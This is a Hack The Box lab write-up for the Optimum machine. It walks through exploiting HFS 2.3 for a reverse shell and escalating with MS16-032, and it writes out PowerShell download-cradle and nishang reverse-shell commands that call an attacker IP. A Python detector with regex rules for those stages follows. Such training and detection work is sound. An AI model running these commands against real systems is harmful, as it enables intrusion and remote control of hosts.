Road to OSCP - Hack The Box Write Up - Optimum


10 Oct 2019

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines on their road to OSCP, a well-known and respected certification that many top cybersecurity positions require. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems that suffer from poor configurations.

Let's start with the fun!

Optimum

Initial Foothold

There is an HTTP File Server (HFS) version 2.3 on port 80. Running searchsploit HFS finds an exploit with RCE for version 2.3.x.

User

  1. Mirror the exploit: searchsploit -m 39161.py.
  2. Rename it: mv 39161.py hts.py.
  3. Start the listener: ncat -lnvp 12345.
  4. Modify the exploit to match our local IP address and the port 12345.
  5. Download nc for windows: wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip.
  6. Unzip the file with unzip netcat-win32-1.11.zip and cd into the extracted directory.
  7. (IMPORTANT) Replace nc.exe with the 64-bit binary: rm nc.exe and mv nc64.exe nc.exe.
  8. Start an HTTP server on port 80: python3 -m http.server 80.
  9. Run the exploit twice: python3 hts.py 10.10.10.8 80.
  10. Our ncat listener should have caught a shell.

Root

Upgrade to a PowerShell shell (refer to the CMD cheatsheet). From there, we can download Sherlock.ps1 to quickly test for different CVEs. While Watson is better, it only supports Windows Server 2016 and 2019.

It looks like it's vulnerable to MS16-032.

If we use the one from exploit-db, it reports success but does not spawn a shell. Apparently it tries to spawn a graphical terminal, so it does not work for us.

There is a modified version of the script on powershell-empire. Add the following line at the end: Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.31:8000/shell.ps1')"

shell.ps1 also comes from powershell-empire; it is /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1. Append this line to the end: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.31 -Port 6969

Set up a python http server: python3 -m http.server. (The default port is port 8000).

Set up a listener: ncat -lnvp 6969.

Finally, on the victim run: IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31:8000/Invoke-MS16032.ps1')
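From the defender's side, every stage of the Root section above leaves a trace in PowerShell script block logging (Event ID 4104): the in-memory download cradle, the Invoke-MS16032 script name and the nishang reverse shell. The following detector is an added example, not part of the original write-up; it runs over a constructed sample of 4104 entries (the attack lines are the ones quoted in this post, the rest is benign noise) and the log line format "<event_id> <host> <script block text>" is an assumption for the sample.

```python
import re
from typing import Dict, List

# Detection rules for the PowerShell stages used in the write-up. Matching is
# case-insensitive because PowerShell is (the post uses both "IEX" and "iex").
RULES = {
    # IEX(New-Object Net.WebClient).DownloadString(...): fetch-and-run in memory
    "download_cradle": re.compile(
        r"(?:iex|invoke-expression)\s*\(\s*new-object\s+(?:system\.)?net\.webclient\s*\)"
        r"\s*\.\s*downloadstring\s*\(", re.I),
    # A script body pulled from a remote URL, even without IEX around it
    "remote_script_url": re.compile(r"downloadstring\s*\(\s*['\"]https?://", re.I),
    # Invoke-PowerShellTcp -Reverse ...: the nishang TCP reverse shell
    "reverse_shell": re.compile(r"invoke-powershelltcp\b[^\n]*-reverse", re.I),
    # Invoke-MS16032: the privilege-escalation script named in the write-up
    "ms16032_script": re.compile(r"invoke-ms16032\b", re.I),
}

# Constructed sample log: assumed format "<event_id> <host> <script block text>".
SAMPLE_LOG = [
    "4104 OPTIMUM Get-ChildItem C:\\Windows\\Temp | Measure-Object",
    "4104 OPTIMUM IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31:8000/Invoke-MS16032.ps1')",
    "4104 OPTIMUM Invoke-MS16032 -Command \"iex(New-Object Net.WebClient).DownloadString('http://10.10.14.31:8000/shell.ps1')\"",
    "4104 OPTIMUM Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.31 -Port 6969",
    "4104 OPTIMUM Get-Service | Where-Object Status -eq Running",
]


def parse_entry(line: str) -> Dict[str, str]:
    """Split '<event_id> <host> <script block text>' into its three fields."""
    event_id, host, text = line.split(" ", 2)
    return {"event_id": event_id, "host": host, "script": text}


def scan(entries: List[str]) -> List[Dict[str, object]]:
    """Return one finding per 4104 entry that matches at least one rule."""
    findings = []
    for line in entries:
        entry = parse_entry(line)
        if entry["event_id"] != "4104":
            continue  # only script block events carry the command text
        hits = [name for name, rx in RULES.items() if rx.search(entry["script"])]
        if hits:
            findings.append({"host": entry["host"], "rules": hits, "script": entry["script"]})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["host"], ",".join(finding["rules"]), "->", finding["script"][:60])
```

On the sample, the three attack lines are flagged and the two benign commands are not; the download cradle and the script name fire on the same entry, which is a useful second signal when the URL alone is not enough.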

Ángel Guzmán/Junior evaluator

Degree and Master's in telecommunications from the University of Granada, specialized in telematics. Joined jtsec in November of 2019 as a Junior cybersecurity evaluator.

Since he joined jtsec, he has participated in several internal hardware hacking projects, while also receiving training on the LINCE certification.

His main motivation is to learn, from small tools for his daily work to new technologies.
